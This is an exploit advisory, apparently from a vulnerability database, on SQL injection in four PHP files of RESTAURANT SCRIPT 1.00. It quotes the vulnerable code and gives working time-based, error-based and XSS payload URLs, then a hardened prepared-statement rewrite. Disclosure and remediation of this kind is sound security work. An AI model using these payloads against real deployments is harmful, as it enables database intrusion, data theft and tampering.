RESTAURANT SCRIPT SQL Injection Vulnerability

2014.10.22
Credit: jsass
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: ©2014 RESTAURANT SCRIPT. ALL RIGHTS RESERVED - SQL Injection Vulnerability
# Date : 22-10-2014
# Author : jsass
# Software Link: http://sourceforge.net/projects/restaurantmis/files/
# Version: 1.00
# Tested on: kali linux
# Twitter : @KwSecurity
# Group : Q8 GRAY HAT TEAM

###########

SQL INJECTION

[1] billing-exec.php

code :

function clean($str) {
    $str = @trim($str);
    if(get_magic_quotes_gpc()) {
        $str = stripslashes($str);
    }
    return mysql_real_escape_string($str);
}

//Sanitize the POST values
$StreetAddress = clean($_POST['sAddress']);
$BoxNo = clean($_POST['box']);
$City = clean($_POST['city']);
$MobileNo = clean($_POST['mNumber']);
$LandlineNo = clean($_POST['lNumber']);

// check if the 'id' variable is set in URL
if (isset($_GET['id'])) {
    // get id value
    $id = $_GET['id'];

    //Create INSERT query
    $qry = "INSERT INTO billing_details(member_id,Street_Address,P_O_Box_No,City,Mobile_No,Landline_No) VALUES('$id','$StreetAddress','$BoxNo','$City','$MobileNo','$LandlineNo')";
    mysql_query($qry) ;

Exploit :

http://localhost/RSv1.0.0/billing-exec.php?id=1' AND SLEEP(5) AND 'Q8'='Q8

[2] reserve-exec.php

function clean($str) {
    $str = @trim($str);
    if(get_magic_quotes_gpc()) {
        $str = stripslashes($str);
    }
    return mysql_real_escape_string($str);
}

if(isset($_POST['table'])){
    $table_id = clean($_POST['table']);
    $table_flag = 1;
}
else if(isset($_POST['partyhall'])){
    $partyhall_id = clean($_POST['partyhall']);
    $partyhall_flag = 1;
}

if (isset($_GET['id'])){
    //get user id
    $id = $_GET['id'];

    //Create INSERT query
    $qry = "INSERT INTO reservations_details(member_id,table_id,partyhall_id,Reserve_Date,Reserve_Time,table_flag,partyhall_flag) VALUES('$id','$table_id','$partyhall_id','$date','$time','$table_flag','$partyhall_flag')";
    mysql_query($qry);

    //redirect to the reserve success page
    header("location: reserve-success.php");
}else {
    die("Reservation failed! Please try again after a few minutes.");
}

You can inject by time-based blind or use sqlmap ...

Exploit :

http://localhost/RSv1.0.0/reserve-exec.php?id=1' AND SLEEP(5) AND 'Q8'='Q8

[3] delete-order.php

// check if the 'id' variable is set in URL
if (isset($_GET['id'])) {
    // get id value
    $id = $_GET['id'];

    // delete the entry
    $result = mysql_query("DELETE FROM orders_details WHERE order_id='$id'"); or die("The order does not exist ... \n");

    // redirect back to the member index
    header("Location: member-index.php");
}
else // if id isn't set, redirect back to member index
{
    header("Location: member-index.php");
}

time-based blind & boolean-based blind & error-based

Exploit :

http://localhost/RSv1.0.0/delete-order.php?id=1' AND (SELECT 1414 FROM(SELECT COUNT(*),CONCAT(0x5138203e3e,Version(),0x3c3c205138,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Q8'='Q8

AND XSS

http://localhost/RSv1.0.0/delete-order.php?id=1'><script>alert('jsass')</script>

[4] reserve-exec.php

if(isset($_POST['table'])){
    $table_id = clean($_POST['table']);
    $table_flag = 1;
}
else if(isset($_POST['partyhall'])){
    $partyhall_id = clean($_POST['partyhall']);
    $partyhall_flag = 1;
}

$date = clean($_POST['date']);
$time = clean($_POST['time']);

//check if the id is set at the link
if (isset($_GET['id'])){
    //get user id
    $id = $_GET['id'];

    //Create INSERT query
    $qry = "INSERT INTO reservations_details(member_id,table_id,partyhall_id,Reserve_Date,Reserve_Time,table_flag,partyhall_flag) VALUES('$id','$table_id','$partyhall_id','$date','$time','$table_flag','$partyhall_flag')";
    mysql_query($qry);

    //redirect to the reserve success page
    header("location: reserve-success.php");
}else {
    die("Reservation failed! Please try again after a few minutes.");
}

Exploit :

http://localhost/RSv1.0.0/reserve-exec.php?id=16' AND SLEEP(5) AND 'Q8'='Q8

###########

Greets : Sec4ever.com & alm3refh.com
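The root cause in every snippet above is the same: the POST fields pass through clean(), but $_GET['id'] is concatenated into the query untouched (and delete-order.php escapes nothing at all). As an added example, not code from the advisory or from the RESTAURANT SCRIPT project, this is the billing-exec.php INSERT rewritten with a mysqli prepared statement, which is also what replaces the mysql_* functions removed in PHP 7; it assumes an existing mysqli connection in $db and the same table and column names. The reserve-exec.php and delete-order.php statements take the same treatment.

```php
<?php
// Hardened form of the billing-exec.php INSERT (added example, not project code).
// Assumes an existing mysqli connection in $db and the advisory's table/columns.

function require_post(string $key): string {
    // A missing field is rejected instead of silently becoming '' in the row.
    if (!isset($_POST[$key])) {
        http_response_code(400);
        exit('Missing field: ' . htmlspecialchars($key, ENT_QUOTES, 'UTF-8'));
    }
    return trim((string) $_POST[$key]);
}

// The original code escaped the POST values but concatenated $_GET['id'] raw.
// member_id is numeric, so validate it as a positive integer; an id such as
// "1' AND SLEEP(5) AND 'Q8'='Q8" fails validation before any SQL is built.
$id = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
if ($id === false || $id === null) {
    http_response_code(400);
    exit('Invalid member id');
}

$streetAddress = require_post('sAddress');
$boxNo         = require_post('box');
$city          = require_post('city');
$mobileNo      = require_post('mNumber');
$landlineNo    = require_post('lNumber');

// Prepared statement: the values are sent separately from the SQL text, so a
// quote character in any field can no longer change the statement structure.
$stmt = $db->prepare(
    'INSERT INTO billing_details
        (member_id, Street_Address, P_O_Box_No, City, Mobile_No, Landline_No)
     VALUES (?, ?, ?, ?, ?, ?)'
);
if ($stmt === false) {
    error_log('billing-exec prepare failed: ' . $db->error); // details stay server-side
    http_response_code(500);
    exit('Billing update failed');
}
$stmt->bind_param('isssss', $id, $streetAddress, $boxNo, $city, $mobileNo, $landlineNo);
if (!$stmt->execute()) {
    error_log('billing-exec execute failed: ' . $stmt->error);
    http_response_code(500);
    exit('Billing update failed');
}
$stmt->close();
```

Returning a generic error and logging $db->error server-side also closes the error-based channel used against delete-order.php, where the database message was echoed to the client.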


Copyright 2024, cxsecurity.com